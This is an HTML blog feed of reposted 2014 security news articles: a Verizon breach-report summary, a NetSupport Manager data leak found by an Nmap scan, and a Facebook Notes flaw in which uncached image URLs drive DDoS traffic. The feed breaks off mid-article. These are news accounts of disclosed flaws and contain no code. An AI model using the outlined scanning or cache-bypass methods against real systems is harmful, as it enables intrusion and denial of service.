Stay tuned<span class="GINGER_SOFTWARE_mark" id="07a55883-495d-4a43-991b-2e78af5e13f8"> …</span> FireEye will provide further data as soon as possible.</div>
<div style="background-color: #f9f7f5; color: #5b6770; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/24403/cyber-crime/fireeye-new-zero-day-ie.html" target="_blank">http://securityaffairs.co/wordpress/24403/cyber-crime/fireeye-new-zero-day-ie.html</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-29322239057373266802014-04-28T21:41:00.000-07:002014-04-28T21:41:03.092-07:00[securityaffairs] Reading the Verizon Data Breach Investigation Report 2014<h2 style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 1.3em; line-height: 26.399999618530273px; margin: 0px; padding: 15px 0px 5px;">
Verizon Data Breach Investigation Report 2014, to better understand how attackers can affect company business, and learn the proper countermeasures.<a name='more'></a></h2>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Verizon firm provided the first data related to its annual report titled <a href="http://www.verizonenterprise.com/DBIR/EarlyAccess" style="color: #005399; font-style: inherit; font-weight: inherit; text-decoration: none;" target="_blank" title="http://www.verizonenterprise.com/DBIR/EarlyAccess">Verizon’s 2014 Data Breach Investigations Report (DBIR)</a>. The document reports specific sections around common incident patterns covering the bad actors, the techniques used, targets hit, timelines of the attacks and specific recommendations to mitigate the threat.</div>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The experts observed that the majority of incidents could be placed into one of nine principal patterns, discovering a correlation between them and various industries.</div>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Verizon-Data-Breach-Investigation-Report-2014-attack-patterns.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="Verizon Data Breach Investigation Report 2014 attack patterns" class="aligncenter wp-image-24386" height="230" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Verizon-Data-Breach-Investigation-Report-2014-attack-patterns.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="Reading the Verizon Data Breach Investigation Report 2014" width="485" /></a></div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The data for Verizon’s 2014 Data Breach Investigations Report (DBIR) were collected with the participation of 50 global companies contributing, 1,367 confirmed data breaches and 63,437 security incidents in representing of 95 countries. The last year was characterized by an impressive number of incidents which involved Payment systems, 2013 may be remembered as the “year of the retailer breach,” <span class="GINGER_SOFTWARE_mark" id="80b217ec-e19a-45af-a718-56dbb3f8452f">an</span> year in which offensives mutated from geopolitical attacks to large-scale attacks on payment card systems. The report identified the following principal motives for bad actors responsible of <a href="http://securityaffairs.co/wordpress/22392/security/data-breaches-2013-tripled.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="The number of data breaches in 2013 tripled … and much more">data breaches</a></div>
<ul style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; list-style: none; margin: 0px 0px 10px 10px; padding: 0px;">
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;">Financial</li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><a href="http://securityaffairs.co/wordpress/23355/hacking/nsa-hacked-huawei-network.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="NSA hacked Huawei network for cyber espionage">Espionage</a></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><a href="http://securityaffairs.co/wordpress/19789/cyber-crime/jeremy-hammond-vs-fbi.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Jeremy Hammond on state-sponsored hacktivism">Ideology/Fun</a></li>
</ul>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
As shown in the graph the cyber espionage is in constant increase while a flection has been observed for Financial motivation, but I believe it is just a temporary phenomenon.<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Verizon-Data-Breach-Investigation-Report-2014-threat-actor-motivation.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="Verizon Data Breach Investigation Report 2014 threat actor motivation" class="aligncenter wp-image-24380" height="231" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Verizon-Data-Breach-Investigation-Report-2014-threat-actor-motivation.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="Reading the Verizon Data Breach Investigation Report 2014" width="467" /></a></div>
<figure style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px;"></figure><div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The industries that most of all were victims of <a href="http://securityaffairs.co/wordpress/21915/intelligence/us-intelligence-cyber-threats.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="US Intelligence warns on Counterintelligence and cyber espionage">cyber espionage</a> attacks from other countries are utilities, manufacturing, and mining. In the below table are reported for each industry the percentage of incidents related to the various attack category. For example, in Accommodation industry the 75% of the attacks is related to <a href="http://securityaffairs.co/wordpress/21337/cyber-crime/blackpos-malware.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="17-years-old teenager is the author of BlackPOS/Kaptoxa malware (Target), several other breaches may be revealed soon">POS Intrusion</a>.</div>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Verizon-Data-Breach-Investigation-Report-2014-attack-x-industries.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="Verizon Data Breach Investigation Report 2014 attack x industries" class="aligncenter wp-image-24389" height="326" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/Verizon-Data-Breach-Investigation-Report-2014-attack-x-industries.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="Reading the Verizon Data Breach Investigation Report 2014" width="463" /></a></div>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The report continues to provide detailed data for each attack method, including recommendations to limit the exposure to the cyber threats. Referring the Web attacks the Verizon data breach reports that the primary causes are the exploitation of weaknesses in the application and the exploitation of stolen credentials to impersonate a valid user.</div>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
A significant number of attacks targeted popular content management systems (e.g., Joomla!, <a href="http://securityaffairs.co/wordpress/23005/hacking/162000-wordpress-instances-abused-ddos-attack.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="162,000 WordPress instances abused for DDoS attack">WordPress</a>, or Drupal) to gain control of servers for use in <a href="http://securityaffairs.co/wordpress/20934/cyber-crime/symantec-network-time-protocol-ntp-reflection-ddos-attacks.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Symantec on Network Time Protocol (NTP) reflection DDoS attacks">DDoS</a> campaigns. Security experts at Verizon recommended the following controls to mitigate the threats:</div>
<ul style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; list-style: none; margin: 0px 0px 10px 10px; padding: 0px;">
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; font-style: inherit; font-weight: inherit; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Don’t use single-factor password <a href="http://securityaffairs.co/wordpress/15786/security/two-factor-authentication-for-smbs.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Two-factor Authentication for SMBs">authentication</a> <span class="GINGER_SOFTWARE_mark" id="094ca6c0-5472-4a8e-947b-02bea0e9bf0a"><span class="GINGER_SOFTWARE_mark" id="9b06e5e3-ca47-47fb-8cf8-f3d3fadf63af"><span class="GINGER_SOFTWARE_mark" id="728286b9-3c27-4b64-985b-520b27e072fa"><span class="GINGER_SOFTWARE_mark" id="f0a40ba3-6cb6-4e1d-a649-231385efd09e"><span class="GINGER_SOFTWARE_mark" id="0657c1f2-149e-4b19-afee-0e30778f2db4"><span class="GINGER_SOFTWARE_mark" id="20a1e477-e377-43aa-8445-3c52853bc5c4"><span class="GINGER_SOFTWARE_mark" id="8708eec6-de20-437a-9775-aec2ac0e5b40"><span class="GINGER_SOFTWARE_mark" id="b4a3fe6d-4bf3-458a-8e1f-d1b538ed8cdc"><span class="GINGER_SOFTWARE_mark" id="4c03aac0-0d1d-41af-abf9-3d375deb3d85"><span class="GINGER_SOFTWARE_mark" id="3d1ee52a-41dd-4411-842e-60cd1180c27c"><span class="GINGER_SOFTWARE_mark" id="33ca765b-3f82-41e9-8941-f760804b467a">on</span></span></span></span></span></span></span></span></span></span></span> anything that faces the Internet;</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; font-style: inherit; font-weight: inherit; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Set up automatic patches for any <a href="http://securityaffairs.co/wordpress/16349/cyber-crime/cyber-crime-securities-markets-and-systemic-risk-study-released.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="“Cyber-crime, securities markets and systemic risk” study released">content management system</a> such as Drupal and WordPress;</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; font-style: inherit; font-weight: inherit; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Fix vulnerabilities right away before the bad guys find them;</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; font-style: inherit; font-weight: inherit; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Enforce lockout policies;</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; font-style: inherit; font-weight: inherit; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Monitor outbound connections.</em></li>
</ul>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The report is full <span class="GINGER_SOFTWARE_mark" id="de1d395a-e428-4cec-876f-f26fcc290e39">of</span> interesting information on data breach<span class="GINGER_SOFTWARE_mark" id="eca7b2c1-fb83-4d82-a640-d38eb1014f6d"> …</span> it’s a must read!</div>
<div style="background-color: #f9f7f5; color: #252525; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/24378/hacking/verizon-data-breach-investigation-2014.html" target="_blank">http://securityaffairs.co/wordpress/24378/hacking/verizon-data-breach-investigation-2014.html</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-40445485185504831512014-04-28T21:39:00.001-07:002014-04-28T21:39:20.832-07:00[securityaffairs] A flaw in old versions of NetSupport Manager exposes company data<h2 style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 1.3em; line-height: 26.399999618530273px; margin: 0px; padding: 15px 0px 5px;">
Researcher David Kirkpatrick discovered a flaw in older versions of NetSupport Manager could expose sensitive configuration settings and lead to compromise.<a name='more'></a></h2>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
A vulnerability in older versions of NetSupport Manager could be a source of serious problems for enterprises that use the platform for remote control of PC and servers. This case is an example of the impact of not updated <span class="GINGER_SOFTWARE_mark" id="74a8e2df-104d-49c7-9b09-c1ce2c01d468">software</span> on the overall security of the companies. The flaw allows an attacker to access to sensitive configuration settings and information.</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The vulnerability was discovered by David Kirkpatrick, a security consultant at Trustwave’s SpiderLabs, which described the flaw in a blog <a href="http://blog.spiderlabs.com/2014/04/netsupport-information-leakage-using-nmap-script.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="http://blog.spiderlabs.com/2014/04/netsupport-information-leakage-using-nmap-script.html">post</a>.</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The researcher in a previous research, documented in a blog <a href="http://blog.spiderlabs.com/2014/03/an-intro-to-netsupport-manager-scripts.html" style="color: #0099ff; font-weight: bold; text-decoration: none;" target="_self">post</a>, demonstrated how to find versions of NetSupport running on clients with default installations that didn’t require authentication to remotely connect to them. Kirkpatrick wrote a script to exploit NetSupport to bypass any Domain or local credentials to remotely connect to the machine and compromise it, but as remarked by the expert the attacker need access to NetSupport Manager software to run it.</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Kirkpatrick has written a simple <span class="GINGER_SOFTWARE_mark" id="e4d3ef4e-0900-4a68-b502-a457930e1e27">Nmap</span> script to perform a silent <span class="GINGER_SOFTWARE_mark" id="1ecdc494-9f64-4297-bbf8-48f055b3bd3b">scan searching</span>vulnerable instance of the software. Kirkpatrick used Wireshark packet analyzer to analyze <span class="GINGER_SOFTWARE_mark" id="92c90c8b-51ad-413b-90f1-4e8a83b15a52">TCP stream</span> of NetSupport service.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“The ‘Connect’ popup that usually appears on the remote PC, when running the previous NetSupport Manager script, did not pop up when using the <span class="GINGER_SOFTWARE_mark" id="f1cee82f-1d62-4940-af07-b7f8f0a9622d"><span class="GINGER_SOFTWARE_mark" id="8aea6ccb-05f0-4f4d-aef6-2d3a164699b5"><span class="GINGER_SOFTWARE_mark" id="84c75788-d4c7-4f73-98cc-d74a2e389cc8"><span class="GINGER_SOFTWARE_mark" id="d3259ebe-4e17-434b-9f18-fd85a94dd28c"><span class="GINGER_SOFTWARE_mark" id="c0b88782-ba02-4400-96ca-4332a289d8f6"><span class="GINGER_SOFTWARE_mark" id="f7fb8667-529f-4aac-ad83-378f951339e9"><span class="GINGER_SOFTWARE_mark" id="f7e24f9d-f525-4698-a4ff-b78bd6d23a9b"><span class="GINGER_SOFTWARE_mark" id="89f4fde0-c10a-41ab-bb13-e9827ae82874"><span class="GINGER_SOFTWARE_mark" id="457e1fad-2193-4960-8dfa-b994ac2f9093">Nmap</span></span></span></span></span></span></span></span></span>script after a connection,”“This meant I could run this script across the network and the clients would be unaware of my testing of their configuration.” Kirkpatrick wrote.</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Kirkpatrick wrote a specific script to verify if the response includes the word “License”</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“If “License” was <span class="GINGER_SOFTWARE_mark" id="48571cd6-d038-482e-8afd-113841adb480"><span class="GINGER_SOFTWARE_mark" id="96a2b814-2ad6-4c65-8d99-a05a23cc1d37"><span class="GINGER_SOFTWARE_mark" id="58f5b0ec-c0bb-4f5b-8ebc-62a18a5c88ec"><span class="GINGER_SOFTWARE_mark" id="f23c0b99-4f9d-4f24-9da5-cd7161407710"><span class="GINGER_SOFTWARE_mark" id="86b962c4-b1c5-433a-884c-d8770e3dbb2f">returned then</span></span></span></span></span> the information was freely retrieved without authentication. If it wasn’t, that meant that most likely authentication was required to get the results of the query.”</em></div>
<div style="font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“With no information on the NetSupport packet format in my test network, I fired up Wireshark and captured all the relevant data sent from the NetSupport Manager when I performed an Inventory query from the Action menu on the manager to another host, as shown below:” said <span style="color: #444444;">Kirkpatrick in the post.</span></em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/NetSupport-vulnerability.png" style="color: #4265a7; font-weight: bold; text-decoration: none;"><img alt="NetSupport vulnerability" class="aligncenter wp-image-24351" height="251" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/NetSupport-vulnerability-1024x506.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="A flaw in old versions of NetSupport Manager exposes company data" width="508" /></a></div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
The data captured by Kirkpatrick contains the NetSupport version info, hostname, user and the encrypted <a href="http://securityaffairs.co/wordpress/21472/digital-id/weak-passwords-2013.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Weak passwords, in 2013 it is still a frequent error">password</a> of the “Configurator Password.”</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
Resuming, the step done by the researcher with the <span class="GINGER_SOFTWARE_mark" id="6ddadae8-6a9b-47e2-b1f6-fd3c02d8f44f">NMap</span> script are</div>
<ul style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; list-style: none; margin: 0px 0px 10px 10px; padding: 0px;">
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Sends a NetSupport Inventory query in raw packets</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Checks if the response includes the word “License”</em><ul style="list-style: none; margin: 0px 0px 10px 10px; padding: 0px;">
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>If so, it has successfully connected to the client without the need for authentication</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>If not, then most probably it requires authentication</em></li>
</ul>
</li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Displays the <span class="GINGER_SOFTWARE_mark" id="b5e21d72-cf72-45ce-9836-cd8110a00d28"><span class="GINGER_SOFTWARE_mark" id="fe36bc82-1376-4523-8217-fbffa6fabcde"><span class="GINGER_SOFTWARE_mark" id="127c7de7-f427-4588-9ed0-e53106acf2b0"><span class="GINGER_SOFTWARE_mark" id="61cfb6de-e622-4c04-aba3-5fb31d022089"><span class="GINGER_SOFTWARE_mark" id="53251c86-7d62-4c59-91c4-891a36e2ab1f">response including</span></span></span></span></span> user information such as hostname, user, version info, password of the “Configurator Password,” etc.</em></li>
</ul>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/NetSupport-vulnerability-data-retrieved.png" style="color: #993333; font-weight: bold; text-decoration: none;"><img alt="NetSupport vulnerability data retrieved" class="aligncenter wp-image-24354" height="324" src="http://securityaffairs.co/wordpress/wp-content/uploads/2014/04/NetSupport-vulnerability-data-retrieved.png" style="border: none; display: block; margin-left: auto; margin-right: auto;" title="A flaw in old versions of NetSupport Manager exposes company data" width="477" /></a></div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
To mitigate the vulnerability in older version it is necessary to change the default setting to enforce <span class="GINGER_SOFTWARE_mark" id="1b116cea-1078-4971-9465-e435c7cd9b0b">password set</span> on clients.</div>
<blockquote style="background-color: #f9f7f5; border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 13px; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<div style="color: #444444; font-size: 1em; margin-bottom: 10px; padding: 0px;">
<em>“In this <span class="GINGER_SOFTWARE_mark" id="95009a8f-6fc3-496c-a3c5-e923fb27d77c"><span class="GINGER_SOFTWARE_mark" id="306a05ab-e73d-49af-a8bb-d6cee8807ec6"><span class="GINGER_SOFTWARE_mark" id="59843de6-c07f-43b9-a041-335de7791481">case installing</span></span></span> the default NetSupport client settings on a PC, where no Client password is set, can allow information to be freely returned, which can assist an attacker. “</em></div>
</blockquote>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
As explained by Kirkpatrick, the flaw in NetSupport software has been fixed in “later revisions.”, version 12 that is currently on the market is secure.</div>
<div style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px; margin-bottom: 10px; padding: 0px;">
<a href="http://securityaffairs.co/wordpress/24348/hacking/flaw-old-versions-netsupport.html" target="_blank">http://securityaffairs.co/wordpress/24348/hacking/flaw-old-versions-netsupport.html</a></div>
Anonymoushttp://www.blogger.com/profile/11284358086402489118noreply@blogger.com0tag:blogger.com,1999:blog-4996980881256752769.post-21868505742533317222014-04-28T21:38:00.002-07:002014-04-28T21:38:29.836-07:00[securityaffairs] How to abuse Facebook feature to conduct powerful DDoS attack<h2 align="justify" class="post-title entry-title url" style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 1.3em; line-height: 26.399999618530273px; margin: 0px; padding: 15px 0px 5px;">
A researcher discovered a flaw in the section “notes” of the social network Facebook that could be exploited by anyone to conduct a powerful DDoS attack.<a name='more'></a></h2>
<div class="post-body entry-content" style="background-color: #f9f7f5; color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 26.399999618530273px;">
<div class="articlebodyonly" id="articlebodyonly" style="color: black;">
<div id="aim11106704030046763357">
<div dir="ltr">
<div>
The Security researcher Chaman Thapa, also known as chr13, discovered a vulnerability in the<b> </b>section ‘Notes’ of the popular <a href="http://securityaffairs.co/wordpress/8371/cyber-crime/social-networks-are-you-exposing-yourself-physical-threats.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Social Networks Part 3 – Are you exposing yourself unnecessarily to physical threats?">social network</a> Facebook that could<span class="GINGER_SOFTWARE_mark" id="afdb1a3d-ac74-4b51-a802-1486e711e422">be</span> exploited by anyone to launch the <a href="http://securityaffairs.co/wordpress/22159/cyber-crime/400gbps-distributed-denial-of-service.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Largest Ever 400Gbps Distributed Denial of Service NTP Amplification attack hit Cloudfare">distributed denial-of-service</a> (DDoS) attack of more than 800 Mbps Bandwidth on any website.</div>
<div>
</div>
<div>
<span class="GINGER_SOFTWARE_mark" id="ed9afaa5-19c3-41df-b150-2a7b0516d649">Chaman</span> Thapa demonstrated that simply reading a ‘Note’ created by anyone on the Facebook platform an attacker could automatically generate malicious traffic against a target.</div>
<div>
The researcher published a blog post to describe the vulnerability, he exploited the possibility to include <img alt="" title="How to abuse Facebook feature to conduct powerful DDoS attack" />tags inside the post to allow the creation of notes that have images from any source.</div>
<div>
</div>
<div>
The attack scenario is very simple, Facebook downloads external images <span class="GINGER_SOFTWARE_mark" id="420493b3-51b5-43bb-a87f-95ab15487ba4">from</span> the original source for the first time only, to improve the performance it stores them in the <span class="GINGER_SOFTWARE_mark" id="cea1c3eb-7af3-432c-a115-39a6c3301ec3">cache</span> for successive uses. If the image url has dynamic parameters, Facebook is not able to store the image in <span class="GINGER_SOFTWARE_mark" id="db8eb545-c7ff-4c02-b8f8-269ea0e512ec">cache</span> and practically it download all the images included in a note each time whenever <span class="GINGER_SOFTWARE_mark" id="c3c86222-5884-4690-a066-ff080d817ced">anybody</span> view the note.</div>
</div>
</div>
<div id="aim21106704030046763357">
<blockquote style="border-left-color: rgb(203, 202, 200); border-left-style: solid; border-left-width: 3px; color: #666666; font-style: italic; line-height: 1.5em; margin: 20px 0px 20px 20px; padding: 0px 0px 0px 20px;">
<em>“Facebook Notes <span class="GINGER_SOFTWARE_mark" id="6fd3fe91-d529-445d-b86a-1e6c8b08457f"><span class="GINGER_SOFTWARE_mark" id="9336b83a-2e7f-40ba-86fe-fa42990da040"><span class="GINGER_SOFTWARE_mark" id="cb738047-8ec5-4f1b-b902-72c51c4c1ec5"><span class="GINGER_SOFTWARE_mark" id="335ce492-bcb1-4974-9541-d4cb54b58375"><span class="GINGER_SOFTWARE_mark" id="32ac7be3-df65-4ac9-a120-de303927e2c0"><span class="GINGER_SOFTWARE_mark" id="420a12ca-7e8d-42cb-8740-d94fd4366535"><span class="GINGER_SOFTWARE_mark" id="1832d254-c297-4ae0-9071-27406fcabbe3"><span class="GINGER_SOFTWARE_mark" id="00e5989e-73c3-4f21-9215-6dbf618523bf"><span class="GINGER_SOFTWARE_mark" id="185235a4-9f49-4a0d-9368-ee00a14edaa5">allows</span></span></span></span></span></span></span></span></span> users to include <<span class="GINGER_SOFTWARE_mark" id="61cea2d6-4009-4dbe-8108-e83be0e51dcb"><span class="GINGER_SOFTWARE_mark" id="4f3cbd9d-68d7-47ce-aae7-504b50c479ec"><span class="GINGER_SOFTWARE_mark" id="4fcd200b-ffd3-4974-80b6-f893ad3236b1"><span class="GINGER_SOFTWARE_mark" id="c140d512-acdd-40f7-9fa2-a2be2b75e5b0"><span class="GINGER_SOFTWARE_mark" id="effba23e-c204-4e4f-93b4-1f2416da98a8"><span class="GINGER_SOFTWARE_mark" id="959e6767-818c-4120-affa-fed256d40017"><span class="GINGER_SOFTWARE_mark" id="b5237311-bfe1-44c2-a679-05aacbd87d53"><span class="GINGER_SOFTWARE_mark" id="ecf05bb3-2f98-4669-8c98-d64906976d71"><span class="GINGER_SOFTWARE_mark" id="14c97f52-68f0-454b-bde6-564095e5cd41">img</span></span></span></span></span></span></span></span></span>> tags. Whenever <span class="GINGER_SOFTWARE_mark" id="800e0374-9a12-48fd-ac54-681db3b369c0"><span class="GINGER_SOFTWARE_mark" id="09b1eff1-1cc9-4a9d-af07-64a98e7dbdd3"><span class="GINGER_SOFTWARE_mark" id="6d01eea2-7d6a-409e-996f-535cbe97e29a"><span class="GINGER_SOFTWARE_mark" id="7ba2482b-778c-4403-82b9-3895ff430eef"><span class="GINGER_SOFTWARE_mark" id="bd2dd8b5-519e-4f43-9eec-80c671fa5365"><span class="GINGER_SOFTWARE_mark" id="7e86d4b8-678b-4e57-8713-670ba6e1c157"><span class="GINGER_SOFTWARE_mark" 